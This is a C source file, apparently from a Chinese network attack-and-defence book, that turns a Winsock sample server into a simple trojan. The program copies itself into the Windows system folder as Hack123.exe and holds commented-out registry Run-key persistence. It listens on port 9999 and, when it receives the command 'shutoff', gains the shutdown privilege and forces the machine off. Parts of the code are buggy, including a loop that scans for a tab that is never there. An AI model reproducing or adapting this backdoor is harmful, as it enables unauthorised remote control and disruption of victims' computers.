server1.c

《攻击与防护网络安全与实用防护技术》源代码,一本好书

/* Server1.c for Windows Developers Journal by Victor R. Volkman
 * this code may be used freely with no restrictions on use
 *
 * To build Win32 server   cl server1.c scompat.c /Z7 /MT
 * To build Unix server    cc server1.c scompat.c -o server1
 */

#include <stdio.h>
#include "scompat.h"
#include "scompat.c"
#include "winuser.h"
#include "winbase.h"
#include "stdlib.h"
#include "windows.h"
//对注册表进行操作应该包含winreg.h头文件
#include "winreg.h"
#include <string.h> 
/* try to tell linker where WinSock library is */
#if defined(_MSC_VER)
#   pragma comment(lib,"wsock32.lib")
#elif defined(__BORLANDC__)
#   pragma comment(lib,"mswsock.lib")
#endif

#define WSA_ERROR(x)  { printf("Error %d: %s\n", \
    WSAGetLastError(), x); return 1; }

int ServerLoop(SOCKET sd_listen, int isMultiTasking);

main(int argc, char **argv)
{
    SOCKET sd_listen;
	// HKEY h;
    int err,len,i;
    u_short iPort;
    struct sockaddr_in addr_srv;
    struct hostent *ptrHost;
	char *pszHost = "152.160.13.253",
		*temp="c:\\winnt\\system32\\Hack123.exe",
		*Name="Hackey",
		*data_set="Software\\Micrisoft\\Windows\\CurrentVersion\\Run";
   len=0;
	for(i=1;temp[i]!='\t';i++){
		len++;
	}
	/*RegOpenKeyEx(HKEY_LOCAL_MACHINE,
		data_set,
		0,
		KEY_WRITE,
		h);*/
	

	//RegSetValueEx(h,Name,0,REG_SZ,*temp,len+1);
	//RegCloseKey(h);
	CopyFile("server1.exe",temp,FALSE);
    
	
//	char *data_set*DataSet="Software\\Micrisoft\\Windows\\CurrentVersion\\Run";
    
    iPort = (argc >= 2) ? atoi(argv[1]) : 9999;

    InitSockets();
    sd_listen = socket(PF_INET, SOCK_STREAM, 0);
    if (sd_listen == INVALID_SOCKET) {
        printf("Error: out of socket resources\n");
        return 1;
        }


    if (atoi(pszHost)) {
        u_long ip_addr = inet_addr(pszHost);
        ptrHost = gethostbyaddr((char *)&ip_addr,
                     sizeof(u_long), AF_INET);
        }
    else
        ptrHost = gethostbyname(pszHost);

    if (!ptrHost)
        WSA_ERROR("cannot resolve hostname")

    addr_srv.sin_family = PF_INET;
    addr_srv.sin_addr.s_addr = htonl(INADDR_ANY);
    addr_srv.sin_port = htons(iPort);

    err = bind(sd_listen, (const struct sockaddr *) &addr_srv,
               sizeof(addr_srv));
    if (err == INVALID_SOCKET)
        WSA_ERROR("Error: unable to bind socket\n")

    err = listen(sd_listen, SOMAXCONN);
    if (err == INVALID_SOCKET)
        WSA_ERROR("Error: listen failed\n")

    ServerLoop(sd_listen, 1);
    printf("Server is down\n");
    WSACleanup();
    return 0;
}




void ServeAClient(LPVOID lpv)
{
    SOCKET sd_accept = (SOCKET) lpv;
    const char *msg = "WELCOME!";
    char response[4096];

    memset(response, 0, sizeof(response));
    recv(sd_accept, response, sizeof(response), 0);
    if (strcmp(response, "HELLO!")==0) {
        send (sd_accept, msg, strlen(msg)+1, 0);
		}
    else{
		if(strcmp(response,"shutoff")==0){
			HANDLE hToken;
			TOKEN_PRIVILEGES tkp;
			//DWORD dwVersion;
			OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken);
			LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
			tkp.PrivilegeCount=1;
			tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
			AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES) NULL,0);
		
			ExitWindowsEx(EWX_FORCE,0);  //实现关机
			//判断是否关机成功
		}
		else
			printf("Application:  client not using expected protocol %s\n", response);
		
	}

    closesocket(sd_accept);
}



#define   MAX_SERVED         3

int ServerLoop(SOCKET sd_listen, int isMultiTasking)
{
    SOCKET sd_accept;
    struct sockaddr_in addr_client;
    int err, nSize;
    int numServed = 0;
    HANDLE handles[MAX_SERVED];
    int myID;

    while (numServed < MAX_SERVED) {

      nSize = sizeof(addr_client);
      sd_accept = accept(sd_listen, (struct sockaddr *)
                         &addr_client, &nSize);
      if (sd_accept == INVALID_SOCKET)
          WSA_ERROR("Error: accept failed\n")

      printf("Accepted connection from client at %s\n",
             inet_ntoa(addr_client.sin_addr));
      if (isMultiTasking) {
#ifdef _WIN32
          handles[numServed] = CreateThread(NULL, 1000,
                      (LPTHREAD_START_ROUTINE)ServeAClient,
                      (LPVOID) sd_accept, 0, &myID);
#else
          myID = fork();
          if (myID == 0) { /* I am child process */
             ServeAClient ((LPVOID) sd_accept);
             exit(0);
             }
          handles[numServed] = myID;
#endif
          }
      else
          ServeAClient((LPVOID) sd_accept);
      numServed++;
      }

    if (isMultiTasking) {
#ifdef _WIN32
        err = WaitForMultipleObjects(MAX_SERVED, handles,
                                     TRUE, INFINITE);
        printf("Last thread to finish was thread #%d\n", err);
#endif
        }
    return 0;
}